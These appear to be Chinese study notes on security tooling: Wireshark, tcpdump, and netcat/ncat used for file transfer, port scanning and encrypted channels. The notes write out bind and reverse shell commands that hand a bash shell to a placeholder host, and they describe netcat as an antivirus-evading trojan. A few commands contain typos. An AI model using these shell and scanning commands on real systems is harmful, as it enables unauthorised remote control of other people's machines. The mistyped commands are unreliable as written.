信息统计（statistics）
节点数
协议分布
包大小分布
会话连接
解码方式
专家系统

实践
抓包对比nc ncat加密与不加密的流量 用WIRESHARK抓包
nc建立连接  
arp 三次握手建立tcp连接 反向arp 传输数据
ncat也一样

当抓大流量时 不适合用WIRESHARK

企业抓包
sniffer
Cace/riverbed（推荐）
Cascad pilot

UDP不确认是否到达 只是发送
TCP确认到达 ack 未收到重新发 因此需要三次握手
SYN - SYN ACK - ACK 
每一次的接收 然后发送 都会携带一个ack

DNS 域名解析
应用层协议

http 访问网站都会走http协议
ftp 应用层协议
自主解析 比如 如果非80端口的 http无法解析 右击解析

右击查看 数据流（http smtp pop3 ssl（比如 https））

常见的协议包
·数据包分层结构
·ARP二层层协议ARP
·SSDP三层协议IP 四层UDP
·ICMP
·IGMP
·TCP--三次握手
·DNS
·HTTP
·FTP

基本使用方法
启动
网卡
（混杂模式 可以抓到不经过该网卡的数据包 非混杂模式 只抓经过该网卡的流量）
抓包筛选器
·过滤掉干扰的数据包
·抓包筛选器（设置网卡时）
·显示筛选器（抓完包后使用）
保存和分析数据包
首选项Edit preferences

nc缺陷
nc传输的所有的数据不加密
ncat（弥补nc缺陷）包含在nmap工具包中
A:ncat ncat -c bash --allow（确定对象） 192.168.20.14 -vnl 333 --ssl（做加密）
B:ncat -nv 1.1.1.1 333 --ssl

不同操作系统nc 参数功能不仅相同
nc -h    man nc

WIRESHARK
抓包嗅探协议分析
安全专家必备的技能
抓包引擎
libpcap9——Linux（抓包后0101010的那种 传给WIRESHARK后解码）
Winpcap10——Windows
解码能力

基本使用方法
启动
网卡
（混杂模式 可以抓到不经过该网卡的数据包 非混杂模式 只抓经过该网卡的流量）
抓包筛选器
·过滤掉干扰的数据包
·抓包筛选器（设置网卡时）
·显示筛选器（抓完包后使用）
保存和分析数据包
首选项Edit preferences

远程控制
正向:
A:nc -lp 333 -c bash
B:nc 1.1.1.1 333
反向:
A:nc -l[ 333
B:nc 1.1.1.1 333 -c bash
注意 windows用户把bash改为cmd

3传输文件/目录
传输文件
A：nc -lp 333 > 1.mp4 打开端口  把端口的侦听到的内容输出到1.mp4 
B: nc -nv 1.1.1.1 333 < 1.mp4 -q 1 连接1.1.1.1 333端口 并把1.mp4 传入到333
A B 互换打开  监听端口
B: nc -lp 333 < 2.mp4 -q 1 把2.mp4 放在端口333中等待别人来下载

传输目录（包括目录里面的所有文件）
A:tar -cvf - -music/（先把目录打包成文件 然后在nc） | nc -lp 333 -q 1
B:nc -nv 1.1.1.1.1 333 | tar -xvf -（连接 然后解包）
| 前面的输出等于后面的输入

加密传文件
A:nc -lp 333（收到文件 后 有后面的命令来解密 然后输出） | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B:mcrypt --flush -Fbq -a rijndael-256 -m ecb（将其进行加密 然后给nc） < 2.mp4 | nc -nv 1.1.1.1 333 -q 1

流媒体服务器
A：cat 1.mp4 | nc -lp 333
B: nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -

端口扫描
nc -nvz（z扫描模式） 1.1.1.1 1-65535（所有端口）
nc -vnzu（加u 显示udp端口是否显示 否则是tcp端口） 1.1.1.1 1-1024

1.telnet/获取banner信息（远程连接）（作为客户端）
nc -h查看参数
nc -v显示详细的连接信息n不会域名解析 IP 端口
然后会显示状态 open等
POP3中 需要使用base64 编码
base64 内容 ctrl D  就编码了
2.传输文本信息
需要一个服务器 开放一个端口 并侦听  然后另一个服务器去连接
A：nc -l -p 4444 打开端口4444 并侦听4444端口
B：nc -nv 1.1.1.1 4444 连接A的ip的端口
连接后就可以聊天呢
用途 ls -l | nc -nv 1.1.1.1 4444 把输出的内容管道输出到本地电脑里 本机里 nc -l -p 4444 > ps.txt 把传入的信息传入到文本里
加-q x（标准的输出完成后 等x秒后就断开连接 其中x是随意指定的数字）

truecrypt
·创建加密文件
 ·可以创建隐藏加密空间 外层与内层密码
 ·标准的加密文件 加密算法 挂载后相当于一个新的硬盘 操作相似

基本工具（重要的工具）
-NETCAT,WIRESHARK TCPDUMP
NETCAT--NC简介（最好去看专业的书籍）
·小身材 大智慧
·侦听模式/传输模式
·telnet/获取banner信息（别人的端口）
·传输文本信息
·传输文件/目录
·加密传输文件
·远程控制/木马（不会被视为病毒查杀）
·加密所有流量
·流媒体服务器
·远程克隆硬盘

过程文档记录

·方便团队内部传输观看

·Dradis 用浏览器打开 可导入 导出（多格式）

·Keepnote只能导出html格式

3 TCPDUMP--抓包
NO-GUI
·抓包
 ·默认只抓68字节
 ·tcpdump -i 网卡 -s（确定抓数据包为多大） 0（数据包多大就抓多大） -w file.pcap
 ·tcpdump -i 网卡 tcp（显示tcp包的） port 22 抓22端口的流量
读取抓包文件
 ·tcpdump -r -A（以ascci码显示） -X（16进制显示） file.pcap
·显示
 ·tcpdump -n -r http.cap（显示数据包） | awk'{prink}'（显示第三行） | sort -u（重复的过滤）
 ·tcpdump -n src（源地址是这个IP） host IP -r http.cap
 ·tcpdump -n dst（目标地址） host IP -r http.cap
 ·tcpdump -n port 53 -r http.cap
 ·tcpdump -nX -r http.cap
·高级筛选
每一行4个字节 一个字节8位 注意从0开始的  tcp【13】 为第14个字节
 ·tcpdump -A（ascci） -n（不做域名解析） ‘tcp【13】（tcp字节为24）=24’-r http.cap